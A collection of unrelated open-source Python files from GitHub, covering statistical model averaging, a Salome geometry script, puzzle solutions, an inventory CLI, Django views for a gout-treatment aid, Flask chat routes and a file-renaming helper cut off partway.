* PPIC_nonlinear_fit(fr, test_data, model_derivs)\n elif IC == \"AIC\":\n LL = -0.5 * AIC_fit(fr)\n elif IC == \"PAIC\":\n if is_linear:\n LL = -0.5 * PAIC_linear_fit(fr, test_data, design_mat)\n else:\n LL = -0.5 * PAIC_nonlinear_fit(fr, test_data, model_derivs)\n elif IC == \"naive\":\n LL = -0.5 * naive_fit(fr)\n else:\n raise ValueError(f\"Unrecognized choice of info criterion: {IC}\")\n\n # Correction to IC is +2*dc - except for naive IC, which ignores this\n if 't_cut' in test_data.keys() and IC != \"naive\":\n dc = len(test_data['t_cut'])\n LL -= dc\n \n if IC != \"naive\" and IC != \"BAIC\" and IC != \"AIC\":\n # Replace +2*k with full bias correction, if option is set\n if full_BC:\n tr_B = full_bias(fr, test_data, model_derivs)\n if 't_cut' in test_data.keys() and len(test_data['t_cut'])>0 and not quiet_full_BC:\n print(\"Warning: Full bias correction neglects long-range correlations. Consider using +2k instead.\")\n \n tr_B = full_bias(fr, model_derivs, ND, yraw)\n\n LL += len(fr.p.keys())\n LL -= tr_B\n\n IC = -2 * LL\n \n if return_prob:\n return IC, np.exp(LL)\n else:\n return IC\n\n \n\ndef model_avg(gv_list, pr_list):\n \"\"\"\n Given a list of single-model expectation values {_M} as gvars,\n and a list of raw model probabilities, return the model-averaged estimate\n for as a gvar.\n \"\"\"\n\n # Ensure model probabilities are normalized to 1\n pr_list /= np.sum(pr_list)\n\n mean_avg = np.sum(gv.mean(gv_list) * pr_list)\n var_avg = np.sum(gv.var(gv_list) * pr_list)\n var_avg += np.sum(gv.mean(gv_list) ** 2 * pr_list)\n var_avg -= (np.sum(gv.mean(gv_list) * pr_list)) ** 2\n\n return gv.gvar(mean_avg, np.sqrt(var_avg))\n\n\n\ndef tensors_linear_fit(fr, test_data, design_mat):\n \"\"\"\n Computes relevant tensors for linear fits.\n \"\"\"\n \n ND = test_data['ND']\n\n cov_data = ND * gv.evalcov(fr.y)\n cov_data_inv = np.linalg.inv(cov_data)\n \n prior_stats = prior_stats_fit(fr)\n cov_prior_inv = prior_stats['cov_prior_inv']\n chi2_prior = prior_stats['chi2_prior']\n grad_prior = prior_stats['grad_prior']\n hess_prior = prior_stats['hess_prior']\n \n cov_best_fit = np.linalg.inv(cov_prior_inv + ND * design_mat.T @ cov_data_inv @ design_mat)\n \n return {'cov_data_inv': cov_data_inv,\n 'chi2_prior': chi2_prior,\n 'hess_prior': hess_prior,\n 'cov_best_fit': cov_best_fit,\n }\n\ndef tensors_nonlinear_fit(fr, test_data, model_derivs):\n \"\"\"\n Computes relevant tensors for nonlinear fits.\n \"\"\"\n \n ND = test_data['ND']\n \n cov_data = ND * gv.evalcov(fr.y)\n cov_data_inv = np.linalg.inv(cov_data) \n \n prior_stats = prior_stats_fit(fr)\n cov_prior_inv = prior_stats['cov_prior_inv']\n chi2_prior = prior_stats['chi2_prior']\n grad_prior = prior_stats['grad_prior']\n hess_prior = prior_stats['hess_prior']\n \n d1_chi2, d2_chi2, d3_chi2 = chi2_derivatives(fr, model_derivs, test_data, chi2_i=False, calc_d3=True)\n \n cov_best_fit = np.linalg.inv(d2_chi2 / 2)\n cov_best_fit_2 = 3 * np.einsum('ab,cd->abcd', cov_best_fit, cov_best_fit)\n \n T = d3_chi2 / 6\n \n return {'cov_data_inv': cov_data_inv,\n 'chi2_prior': chi2_prior,\n 'grad_prior': grad_prior,\n 'hess_prior': hess_prior,\n 'cov_best_fit': cov_best_fit,\n 'cov_best_fit_2': cov_best_fit_2,\n 'T': T\n }\n\n\n\ndef prior_stats_fit(fr):\n \"\"\"\n Computes prior statistics from fit object.\n \"\"\"\n \n cov_prior = np.zeros((len(fr.prior.flat), len(fr.prior.flat)), float)\n blocks = gv.evalcov_blocks(fr.prior, compress=True)\n # uncorrelated pieces are diagonal\n idx, sdev = blocks[0]\n cov_prior[idx, idx] = sdev ** 2\n # correlated pieces\n for idx, bcov in blocks[1:]:\n cov_prior[idx[:, None], idx] = bcov\n \n cov_prior_inv = np.linalg.inv(cov_prior)\n \n p_prior = gv.mean(fr.prior.values())\n p_best_fit = gv.mean(fr.p.values())\n \n chi2_prior = (p_best_fit - p_prior).T @ cov_prior_inv @ (p_best_fit - p_prior)\n grad_prior = 2 * cov_prior_inv @ (p_best_fit - p_prior)\n hess_prior = 2 * cov_prior_inv\n \n return {'cov_prior_inv': cov_prior_inv,\n 'chi2_prior': chi2_prior,\n 'grad_prior': grad_prior,\n 'hess_prior': hess_prior,\n }\n\ndef chi2_derivatives(fr, model_derivs, test_data, chi2_i=True, calc_d3=True):\n \"\"\"\n Compute and return derivatives of the chi-squared function.\n\n Args:\n fr: Fit result object.\n model_derivs: Model derivatives dictionary (defined in synth_data.py.)\n test_data: Data dictionary.\n chi2_i: If \"True\", compute derivatives of the individual \\chi_i^2 functions, \n return as an array over the sample index. Otherwise, compute derivatives\n of the average chi-squared.\n calc_d3: If \"True\", compute and return the third derivative, otherwise skip it\n to reduce computational cost.\n\n Returns:\n An array of derivatives of up to length 3 (if calc_d3 is True.)\n \"\"\"\n\n ND = test_data['ND']\n\n cov_data = ND * gv.evalcov(fr.y)\n cov_data_inv = np.linalg.inv(cov_data) \n \n prior_stats = prior_stats_fit(fr)\n cov_prior_inv = prior_stats['cov_prior_inv']\n \n p_prior = gv.mean(fr.prior.values())\n p_best_fit = gv.mean(fr.p.values())\n \n \n if chi2_i:\n delta = test_data['yraw'] - gv.mean(fr.fcn(fr.x, fr.p))\n else:\n delta = gv.mean(fr.y) - gv.mean(fr.fcn(fr.x,fr.p))\n \n d1_model = model_derivs['d1_model']\n d2_model = model_derivs['d2_model']\n d3_model = model_derivs['d3_model']\n \n if chi2_i:\n d1_chi2 = 2 * (np.einsum('ab,b->a', cov_prior_inv, p_best_fit-p_prior)/ND - np.einsum('ba,bc,ic->ia', d1_model, cov_data_inv, delta))\n d2_chi2 = 2 * (cov_prior_inv/ND - np.einsum('cba,cd,id->iab', d2_model, cov_data_inv,delta) + np.einsum('ba,bc,cd->ad', d1_model, cov_data_inv, d1_model))\n else:\n d1_chi2 = 2 * (np.einsum('ab,b->a', cov_prior_inv, p_best_fit-p_prior) - np.einsum('ba,bc,c->a', d1_model, ND * cov_data_inv, delta))\n d2_chi2 = 2 * (cov_prior_inv - np.einsum('cba,cd,d->ab', d2_model, ND * cov_data_inv,delta) + np.einsum('ba,bc,cd->ad', d1_model, ND * cov_data_inv, d1_model))\n\n if calc_d3:\n if chi2_i:\n d3_chi2 = 2 * (-np.einsum('dcba,de,ie->iabc', d3_model, cov_data_inv, delta) + (np.einsum('cba,cd,de->abe', d2_model, cov_data_inv, d1_model) + np.einsum('cba,cd,de->aeb', d2_model, cov_data_inv, d1_model) + np.einsum('cba,cd,de->eab', d2_model, cov_data_inv, d1_model)))\n else:\n d3_chi2 = 2 * (-np.einsum('dcba,de,e->abc', d3_model, ND * cov_data_inv, delta) + (np.einsum('cba,cd,de->abe', d2_model, ND * cov_data_inv, d1_model) + np.einsum('cba,cd,de->aeb', d2_model, ND * cov_data_inv, d1_model) + np.einsum('cba,cd,de->eab', d2_model, ND * cov_data_inv, d1_model)))\n \n return [d1_chi2, d2_chi2, d3_chi2]\n else:\n return [d1_chi2, d2_chi2]\n\n\ndef full_bias(fr, test_data, model_derivs):\n \"\"\"\n Computes the full bias correction.\n \"\"\"\n\n d1_chi2, d2_chi2 = chi2_derivatives(fr, model_derivs, test_data, chi2_i=True, calc_d3=False)\n\n J = np.sum(d2_chi2, axis=0) / (2*test_data['ND'])\n\n I = np.einsum('ia,ib->ab', d1_chi2, d1_chi2) / (4 * (test_data['ND']-1))\n\n tr_term = np.linalg.inv(J) @ I\n\n return np.trace(tr_term)\n","repo_name":"jwsitison/improved_model_avg_paper","sub_path":"improved_model_averaging/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":14206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"23257220351","text":"import geompy\nimport salome\ngg = salome.ImportComponentGUI(\"GEOM\")\n\n#creamos dos vertices y un vector\n#p1 = geompy.MakeVertex(35, 40, 45)\n#p2 = geompy.MakeVertex(35, 45, 70)\n#v = geompy.MakeVector(p1, p2)\n\n#creamos los toroides\n#torus1 = geompy.MakeTorus(p1, v, 20, 10)\ntorus2 = geompy.MakeTorusRR(300, 150)\n\n#agregamos los objetos al estudio\nid_torus1 = geompy.addToStudy(torus1,\"Torus1\")\nid_torus2 = geompy.addToStudy(torus2,\"Torus2\")\n\n#dibujamos los toroides\ngg.createAndDisplayGO(id_torus1)\ngg.setDisplayMode(id_torus1,1)\ngg.createAndDisplayGO(id_torus2)\ngg.setDisplayMode(id_torus2,1)\n","repo_name":"m0nT3cR1s70/salomeToRoot","sub_path":"examples/torus/torus.py","file_name":"torus.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"2374185549","text":"class Solution(object):\n def maxSubArrayLen(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: int\n\n Given an array nums and a target value k, find the maximum length of a subarray that sums to k. If there isn't one, return 0 instead.\n\n Note:\n The sum of the entire nums array is guaranteed to fit within the 32-bit signed integer range.\n\n Example 1:\n Given nums = [1, -1, 5, -2, 3], k = 3,\n return 4. (because the subarray [1, -1, 5, -2] sums to 3 and is the longest)\n\n Example 2:\n Given nums = [-2, -1, 2, 1], k = 1,\n return 2. (because the subarray [-1, 2] sums to 1 and is the longest)\n\n Follow Up:\n Can you do it in O(n) time?\n \"\"\"\n subarr_len = 0\n running_sum = 0\n my_dict = {0: -1} # whenever running sum is 0, value at my_dict[0] remains -1. this is good\n # because we want consecutive values in sub array that total to 0 inorder to get longest\n # subarray that totals to k\n\n # What made running sum increase?\n # If it increased by \"k\", that means\n # there are elements that sum to exactly\n # \"k\" in between.\n for i in range(len(nums)):\n running_sum += nums[i]\n if running_sum not in my_dict:\n my_dict[running_sum] = i\n if running_sum-k in my_dict:\n # if true, running sum increased by k\n subarr_len = max(subarr_len, i-my_dict[running_sum-k])\n print(my_dict)\n return subarr_len\n\n\n\nsoln = Solution()\nprint(soln.maxSubArrayLen([1, 2, 3, 4, 2, 9, 3, 6], 9))\n #running sum 1 3 6 10 12 21 24 30","repo_name":"kachrya/CodingYoga","sub_path":"PythonProjects/MaxSubArrayEqualK.py","file_name":"MaxSubArrayEqualK.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"34236947625","text":"import base64\nimport io\nimport json\nimport subprocess\nimport sys\n\ntry:\n _, project, aur_pkgname, aur_pkgname_git, version, use_git = sys.argv\nexcept ValueError:\n sys.stderr.write(\"Usage: ./aurvm_client.py $PROJECT $AUR_PKGANME $AUR_PKGNAME_GIT $version use_git[true|false]\\n\")\n sys.exit(1)\n\nuse_git = True if use_git == 'true' else False\nif use_git:\n gitver = subprocess.check_output(r\"git describe --long | sed -E 's/([^-]*-g)/r\\1/;s/-/./g;s/^v//g'\", shell=True)\n gitver = gitver.decode('utf-8').strip()\nelse:\n gitver = None\n\nwith io.open('PKGBUILD', 'r', encoding='utf-8') as fh:\n pkgbuild = fh.read()\n\ndata = json.dumps({\n 'project': project,\n 'aur_pkgname': aur_pkgname,\n 'aur_pkgname_git': aur_pkgname_git,\n 'version': version,\n 'use_git': use_git,\n 'gitver': gitver,\n 'pkgbuild': pkgbuild,\n '_api': '2'\n}, ensure_ascii=True, sort_keys=True).encode('utf-8')\n\nprint(base64.b64encode(data).decode('utf-8'))\n","repo_name":"Kwpolska/python-project-template","sub_path":"{{cookiecutter.repo_name}}/pypt-extras/AUR/AURvm/aurvm_client.py","file_name":"aurvm_client.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":170,"dataset":"github-code","pt":"85"} +{"seq_id":"30424327238","text":"#!/usr/bin/python3\n#\n# Advent of Code 2019\n# Day 2 : 1202 Program Alarm\n# \n# Author : Charlie Rose\n# Language : Python3\n# Date : 12/4/2019\n\nif __name__ == \"__main__\":\n f = open(\"day2input.txt\")\n\n # read the file and prep it for parsing\n init_program = f.readlines()[0].split(\",\")\n for i in range(0, len(init_program)):\n init_program[i] = int(init_program[i])\n\n \n for noun in range(0, 99):\n for verb in range(0,99):\n\n # Prep program for runnning\n program = []\n for i in init_program:\n program.append(i)\n\n program[1] = noun\n program[2] = verb\n i = 0\n\n # run program with inputs\n while i < len(program):\n # Opcode 1 : Add\n if program[i] == 1:\n operand1 = program[i + 1]\n operand2 = program[i + 2]\n dest = program[i + 3]\n \n program[dest] = program[operand1] + program[operand2]\n \n i += 4\n\n # Opcode 2 : Multiply\n if program[i] == 2:\n operand1 = program[i + 1]\n operand2 = program[i + 2]\n dest = program[i + 3]\n \n program[dest] = program[operand1] * program[operand2]\n \n i += 4\n\n # Opcode 99 : Halt\n if program[i] == 99:\n if program[0] == 19690720:\n print(\"Noun : \" + str(noun) + \", Verb : \" + str(verb) + \", Output : \" + str(program[0]))\n \n break\n\n\n f.close()\n","repo_name":"charlieroses/AdventOfCode","sub_path":"2019/02/day2p2.py","file_name":"day2p2.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"12841664021","text":"import datetime\nimport csv\nimport os\nfrom collections import OrderedDict\n\nfrom peewee import *\n\ndb = SqliteDatabase('inventory.db')\n\n\nclass Product(Model):\n product_id = AutoField(primary_key=True)\n product_name = CharField(max_length=100, unique=True)\n product_quantity = IntegerField(default=0)\n product_price = IntegerField(default=0)\n date_updated = DateField(default=datetime.datetime.now)\n\n class Meta:\n database = db\n\n\ndef initialize():\n \"\"\"Create the database and tables if they don't exist.\"\"\"\n db.connect()\n db.create_tables([Product], safe=True)\n clean_data()\n\n\ndef clear():\n \"\"\"Clear screen\"\"\"\n os.system('cls' if os.name == 'nt' else 'clear')\n\n\ndef clean_data():\n \"\"\"Clean data\"\"\"\n with open('inventory.csv', newline='') as csvfile:\n inventory_reader = csv.DictReader(csvfile, delimiter=',')\n rows = list(inventory_reader)\n for row in rows:\n row['product_name'] = row['product_name']\n row['product_price'] = (row['product_price']\n .strip('$').replace('.', ''))\n row['product_price'] = int(row['product_price'])\n row['product_quantity'] = int(row['product_quantity'])\n row['date_updated'] = datetime.datetime.strptime(\n row['date_updated'], \"%m/%d/%Y\").date()\n\n try:\n Product.create(product_name=row['product_name'],\n product_price=row['product_price'],\n product_quantity=row['product_quantity'],\n date_updated=row['date_updated'])\n except IntegrityError:\n product_record = Product.get(product_name=row['product_name'])\n if product_record.date_updated < row['date_updated']:\n product_record.product_price = (row['product_price'])\n product_record.product_quantity = row['product_quantity']\n product_record.date_updated = row['date_updated']\n product_record.save()\n\n\ndef menu_loop():\n \"\"\"Show menu\"\"\"\n choice = None\n clear()\n while True:\n print('=' * 6 + ' Menu ' + '=' * 6 + '\\n\\n')\n print(\"Enter 'q' to quit\\n\\nSelect an option from menu:\")\n\n for key, value in menu.items():\n print(\"{}) {}\".format(key, value.__doc__))\n try:\n choice = input('Action: ').lower().strip()\n if choice not in menu and choice != 'q':\n raise ValueError('Enter an option from menu')\n except ValueError as err:\n print(f'Invalid input {err}')\n else:\n if choice in menu:\n clear()\n menu[choice]()\n\n if choice == 'q':\n print('\\n\\n' + '=' * 14 + \"\\nSee you later!\\n\" + '=' * 14)\n break\n\n\ndef add_product():\n \"\"\"Add a product\"\"\"\n while True:\n try:\n prod_name = input(\"Enter product name: \")\n clear()\n prod_price = input(\"Enter product price in the form of\"\n \"(example: $1:50): \").strip('$').replace('.', '')\n if len(prod_price) < 3:\n prod_price = prod_price + '00'\n prod_price = int(prod_price)\n clear()\n prod_quantity = int(\n input(\"Enter product quantity in digits(example: 123): \"))\n date_added = datetime.datetime.now().date()\n except ValueError:\n print(\"You must enter required details as shown in example.\")\n else:\n if prod_name and prod_price and prod_quantity:\n confirm = input(\"Save product? [Y/N]: \").lower().strip()\n clear()\n if confirm == 'y':\n try:\n Product.create(product_name=prod_name,\n product_price=prod_price,\n product_quantity=prod_quantity,\n date_updated=date_added)\n except IntegrityError:\n existing_product = Product.select().where(Product.product_name == prod_name)\n existing_date = existing_product.get().date_updated\n if existing_date <= date_added:\n Product.update(product_name=prod_name,\n product_price=prod_price,\n product_quantity=prod_quantity,\n date_updated=date_added).where(\n Product.product_name == prod_name).execute()\n print(\"Existing product price updated\")\n else:\n break\n break\n\n\ndef delete_product(product):\n \"\"\"Delete a product\"\"\"\n if input(\"Are you sure you want to delete this product? [Y/N] \").lower() == 'y':\n product.delete_instance()\n print(\"product deleted\")\n\n\ndef view_product():\n \"\"\"View a product\"\"\"\n while True:\n try:\n inv = Product.select()\n len_inv = inv.count()\n search_id = input(f\"Enter Product id between 1 & {len_inv}:> \")\n if search_id == 'q':\n break\n search_id = int(search_id)\n product = Product.get(Product.product_id == search_id)\n if search_id not in Product.product_id:\n raise DoesNotExist\n except DoesNotExist:\n print('This product id not in inventory list, Try again')\n except ValueError:\n print('This product id not in inventory list, Try again(Use digits only)')\n else:\n clear()\n print(f'Product id: {product.product_id}')\n print(f'Product: {product.product_name}')\n print(f'Price: ${\"{:.2f}\".format(product.product_price / 100)}')\n print(f'Quantity: {product.product_quantity}')\n print(f'Date updated: {product.date_updated}')\n print('\\n\\nPress Enter To pick another product')\n print('d) Delete product')\n print('q) Return to main menu')\n\n next_action = input('Action: [Enter/d/q]').lower().strip()\n clear()\n if next_action == 'q':\n break\n elif next_action == 'd':\n delete_product(product)\n\n\ndef backup_inventory():\n \"\"\"Backup inventory\"\"\"\n with open('backup.csv', 'a') as csvfile:\n fieldnames = ['product_id', 'product_name', 'product_price',\n 'product_quantity', 'date_updated']\n productwriter = csv.DictWriter(csvfile, fieldnames=fieldnames)\n\n productwriter.writeheader()\n prod_lst = Product.select().order_by(Product.product_id.asc())\n for produ in prod_lst:\n productwriter.writerow({\n 'product_id': produ.product_id,\n 'product_name': produ.product_name,\n 'product_price': produ.product_price,\n 'product_quantity': produ.product_quantity,\n 'date_updated': produ.date_updated,\n })\n print(\"backup.csv was created successfully!\")\n\n\nmenu = OrderedDict([\n ('v', view_product),\n ('a', add_product),\n ('b', backup_inventory),\n])\n\nif __name__ == '__main__':\n initialize()\n menu_loop()\n","repo_name":"AmmarCode/TechDegree-Project4-StoreInventory","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"34353330404","text":"import json\nimport classes\nimport pandas as pd\nimport arff\n\n\nclass JSONParser:\n appropriateConstructor = {\n 'area': classes.Area,\n 'time': classes.Time,\n 'labeled': classes.Labeled,\n 'interval': classes.Interval,\n 'sum_interval': classes.SumInterval,\n 'difference_interval': classes.TimeInterval,\n }\n\n def __init__(self, jsonFileName):\n jsonFile = open(jsonFileName)\n self.json = json.load(jsonFile)\n jsonFile.close()\n\n def generateArff(self, deviceID, start, end):\n dataFrame = self.generateDataFrame(deviceID, start, end)\n headers = list(dataFrame.columns.values)\n out = open('out.arff', 'w')\n out.write(\"@RELATION aware\\n\\n\")\n for header in headers:\n labels = \",\".join(pd.unique(dataFrame[header].values)).replace(' ', '_')\n out.write(\"@ATTRIBUTE \" + header + \" {\" + labels + \"} %string\\n\")\n out.write(\"\\n@DATA\\n\")\n for row in dataFrame.values:\n out.write(\",\".join(row).replace(' ', '_'))\n out.write(\"\\n\")\n out.close()\n \n def generateDataFrame(self, deviceID, start, end):\n dataFrames = []\n for categoryName, category in self.json.items():\n for entry in category['entries']:\n type = entry['type']\n if type == 'time':\n time = self.appropriateConstructor[type](entry)\n continue\n else:\n jsonObject = self.appropriateConstructor[type](entry)\n data = jsonObject.getLabeledData(deviceID, start, end)\n dataFrames.append(data)\n result = pd.concat(dataFrames, axis = 1).ffill().bfill()\n result.index = pd.to_datetime(result.index, unit = 'ms')\n timeLabeled = time.labelData(result.index.hour)\n result['time'] = pd.Series(timeLabeled, result.index)\n return result\n","repo_name":"sbdzdz/db2arff","sub_path":"src/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"15947511124","text":"from typing import TYPE_CHECKING, Any\n\nfrom django.apps import apps # type: ignore\nfrom django.contrib.messages.views import SuccessMessageMixin # type: ignore\nfrom django.db.models import Q # type: ignore\nfrom django.views.generic import DetailView, TemplateView, View # type: ignore\n\nfrom ..contents.choices import Contexts\nfrom ..dateofbirths.forms import DateOfBirthFormOptional\nfrom ..dateofbirths.models import DateOfBirth\nfrom ..ethnicitys.forms import EthnicityForm\nfrom ..ethnicitys.models import Ethnicity\nfrom ..genders.forms import GenderFormOptional\nfrom ..genders.models import Gender\nfrom ..labs.forms import Hlab5801Form\nfrom ..labs.models import Hlab5801\nfrom ..medhistorys.choices import MedHistoryTypes\nfrom ..medhistorys.forms import (\n AllopurinolhypersensitivityForm,\n AnginaForm,\n CadForm,\n ChfForm,\n CkdForm,\n FebuxostathypersensitivityForm,\n HeartattackForm,\n OrgantransplantForm,\n PvdForm,\n StrokeForm,\n XoiinteractionForm,\n)\nfrom ..medhistorys.models import (\n Allopurinolhypersensitivity,\n Angina,\n Cad,\n Chf,\n Ckd,\n Febuxostathypersensitivity,\n Heartattack,\n Organtransplant,\n Pvd,\n Stroke,\n Xoiinteraction,\n)\nfrom ..treatments.choices import UltChoices\nfrom ..utils.views import MedHistorysModelCreateView, MedHistorysModelUpdateView\nfrom .forms import UltAidForm\nfrom .models import UltAid\nfrom .selectors import ultaid_userless_qs\n\nif TYPE_CHECKING:\n from django.db.models import QuerySet # type: ignore\n\n\nclass UltAidAbout(TemplateView):\n \"\"\"About page for gout flare prophylaxis and PpxAids.\"\"\"\n\n template_name = \"ultaids/about.html\"\n\n def get_context_data(self, **kwargs: Any) -> dict[str, Any]:\n context = super().get_context_data(**kwargs)\n context.update({\"content\": self.content})\n return context\n\n @property\n def content(self):\n return apps.get_model(\"contents.Content\").objects.get(slug=\"about\", context=Contexts.ULTAID, tag=None)\n\n\nclass UltAidBase(View):\n class Meta:\n abstract = True\n\n model = UltAid\n form_class = UltAidForm\n # Assign onetoones dict with key as the name of the model and value as a\n # dict of the model's form and model.\n onetoones = {\n \"dateofbirth\": {\"form\": DateOfBirthFormOptional, \"model\": DateOfBirth},\n \"ethnicity\": {\"form\": EthnicityForm, \"model\": Ethnicity},\n \"gender\": {\"form\": GenderFormOptional, \"model\": Gender},\n \"hlab5801\": {\"form\": Hlab5801Form, \"model\": Hlab5801},\n }\n # Assign medallergys as the Treatment choices for UltAid\n medallergys = UltChoices\n # Assign medhistorys dict with key as the name of the model and value as a\n # dict of the model's form and model.\n medhistorys = {\n MedHistoryTypes.ALLOPURINOLHYPERSENSITIVITY: {\n \"form\": AllopurinolhypersensitivityForm,\n \"model\": Allopurinolhypersensitivity,\n },\n MedHistoryTypes.ANGINA: {\"form\": AnginaForm, \"model\": Angina},\n MedHistoryTypes.CAD: {\"form\": CadForm, \"model\": Cad},\n MedHistoryTypes.CHF: {\"form\": ChfForm, \"model\": Chf},\n MedHistoryTypes.CKD: {\"form\": CkdForm, \"model\": Ckd},\n MedHistoryTypes.FEBUXOSTATHYPERSENSITIVITY: {\n \"form\": FebuxostathypersensitivityForm,\n \"model\": Febuxostathypersensitivity,\n },\n MedHistoryTypes.HEARTATTACK: {\"form\": HeartattackForm, \"model\": Heartattack},\n MedHistoryTypes.ORGANTRANSPLANT: {\"form\": OrgantransplantForm, \"model\": Organtransplant},\n MedHistoryTypes.PVD: {\"form\": PvdForm, \"model\": Pvd},\n MedHistoryTypes.STROKE: {\"form\": StrokeForm, \"model\": Stroke},\n MedHistoryTypes.XOIINTERACTION: {\"form\": XoiinteractionForm, \"model\": Xoiinteraction},\n }\n # Set ckdetail to True so that parent model will include processing for CkdDetail and BaselineCreatinine\n medhistory_details = [MedHistoryTypes.CKD]\n\n\nclass UltAidCreate(UltAidBase, MedHistorysModelCreateView, SuccessMessageMixin):\n \"\"\"\n Create a new UltAid instance.\n \"\"\"\n\n def post(self, request, *args, **kwargs):\n (\n errors,\n form,\n _, # object_data\n _, # onetoone_forms\n _, # medallergys_forms\n _, # medhistorys_forms\n _, # medhistorydetails_forms\n _, # labs_formset\n onetoones_to_save,\n medallergys_to_add,\n medhistorys_to_add,\n medhistorydetails_to_add,\n labs_to_add,\n ) = super().post(request, *args, **kwargs)\n if errors:\n return errors\n else:\n return self.form_valid(\n form=form, # type: ignore\n medallergys_to_add=medallergys_to_add,\n onetoones_to_save=onetoones_to_save,\n medhistorydetails_to_add=medhistorydetails_to_add,\n medhistorys_to_add=medhistorys_to_add,\n labs_to_add=labs_to_add,\n )\n\n\nclass UltAidDetail(DetailView):\n \"\"\"DetailView for UltAid model.\"\"\"\n\n model = UltAid\n object: UltAid\n\n def get_context_data(self, **kwargs: Any) -> dict[str, Any]:\n context = super().get_context_data(**kwargs)\n for content in self.contents:\n context.update({content.slug: {content.tag: content}}) # type: ignore\n return context\n\n def get_queryset(self) -> \"QuerySet[Any]\":\n return ultaid_userless_qs(self.kwargs[\"pk\"])\n\n def get_object(self, *args, **kwargs) -> UltAid:\n ultaid: UltAid = super().get_object(*args, **kwargs) # type: ignore\n # Prefetch goalurate medhistory_qs for use in the template and to avoid additional queries\n if hasattr(ultaid, \"goalurate\"):\n ultaid.goalurate.medhistorys_qs = ultaid.goalurate.medhistorys.all()\n if not self.request.GET.get(\"goalurate_updated\", None):\n ultaid.goalurate.update(qs=ultaid.goalurate)\n # Check if UltAid is up to date and update if not update\n if not self.request.GET.get(\"updated\", None):\n ultaid.update(qs=ultaid)\n return ultaid\n\n @property\n def contents(self):\n return apps.get_model(\"contents.Content\").objects.filter(Q(tag__isnull=False), context=Contexts.ULTAID)\n\n\nclass UltAidUpdate(UltAidBase, MedHistorysModelUpdateView, SuccessMessageMixin):\n \"\"\"Updates a UltAid\"\"\"\n\n def get_queryset(self):\n return ultaid_userless_qs(self.kwargs[\"pk\"])\n\n def post(self, request, *args, **kwargs):\n (\n errors,\n form,\n _, # object_data\n _, # onetoone_forms\n _, # medhistorys_forms\n _, # medhistorydetails_forms\n _, # medallergys_forms\n _, # labs_formset\n medallergys_to_add,\n medallergys_to_remove,\n onetoones_to_delete,\n onetoones_to_save,\n medhistorydetails_to_add,\n medhistorydetails_to_remove,\n medhistorys_to_add,\n medhistorys_to_remove,\n labs_to_add,\n labs_to_remove,\n labs_to_update,\n ) = super().post(request, *args, **kwargs)\n if errors:\n return errors\n else:\n return self.form_valid(\n form=form, # type: ignore\n medallergys_to_add=medallergys_to_add,\n medallergys_to_remove=medallergys_to_remove,\n onetoones_to_delete=onetoones_to_delete,\n onetoones_to_save=onetoones_to_save,\n medhistorydetails_to_add=medhistorydetails_to_add,\n medhistorydetails_to_remove=medhistorydetails_to_remove,\n medhistorys_to_add=medhistorys_to_add,\n medhistorys_to_remove=medhistorys_to_remove,\n labs_to_add=labs_to_add,\n labs_to_remove=labs_to_remove,\n labs_to_update=labs_to_update,\n )\n","repo_name":"Spiewart/gouthelper","sub_path":"gouthelper/ultaids/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"5253730923","text":"# Written by Student 1 Yutong Cheng\nfrom flask import session, redirect, url_for, render_template, request, make_response, flash\nfrom . import bp_chatapp\nfrom .forms import LoginForm\nfrom flask_login import current_user\nfrom app.models import Project, Team, Userstory, User, TeamUserLink\n\n@bp_chatapp.route('/room', methods=['GET', 'POST'])\ndef room():\n \"\"\"Login form to enter a room.\"\"\"\n if current_user.is_authenticated:\n team_form = LoginForm(request.form)\n\n name = current_user.name\n user_id = current_user.user_id\n team = TeamUserLink.query.join(Team).with_entities(Team.name)\\\n .filter(TeamUserLink.user_id.contains(user_id)).all()\n team_list = [(i.name,i.name)for i in team]\n team_list = list(set(team_list))\n team_list.append(('Public','Public'))\n team_form.team.choices = team_list\n if request.method == 'POST':\n session['Your name'] = name\n session['Team'] = team_form.team.data\n return redirect(url_for('.chat'))\n else:\n response = make_response(redirect(url_for('auth.login')))\n flash('Please Login First To Use The Chat Function')\n return response\n return render_template('chat_index.html', team_form=team_form)\n\n\n@bp_chatapp.route('/chat')\ndef chat():\n \"\"\"Chat room. The user's name and room must be stored in\n the session.\"\"\"\n name = session.get('Your name', '')\n team = session.get('Team', '')\n if name == '' or room == '':\n return redirect(url_for('.index'))\n return render_template('chat.html', name=name, team=team)\n","repo_name":"carlchengyt/Group6_WebApp","sub_path":"app/chatapp/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"9976824858","text":"import os\nimport re\n\ndef rename_file(filename):\n \"\"\"\n Renames a given filename by reordering its parts and making specific replacements.\n \n Args:\n filename (str): The original filename.\n \n Returns:\n str: The renamed filename.\n \"\"\"\n # Extract the file extension\n base_name, file_extension = os.path.splitext(filename)\n \n # Define the regex pattern to capture different parts of the filename\n pattern = re.compile(r'^(CT_)(.*?)_(C-[A-Z0-9]+)_(.*)$')\n match = pattern.search(base_name)\n \n # If the pattern matches, construct the renamed filename based on the matched groups\n if match:\n renamed_base = f\"{match.group(1)}{match.group(3)}_{match.group(2)}_{match.group(4)}\"\n if not renamed_base.endswith('_mid'):\n renamed_base += '_mid'\n return 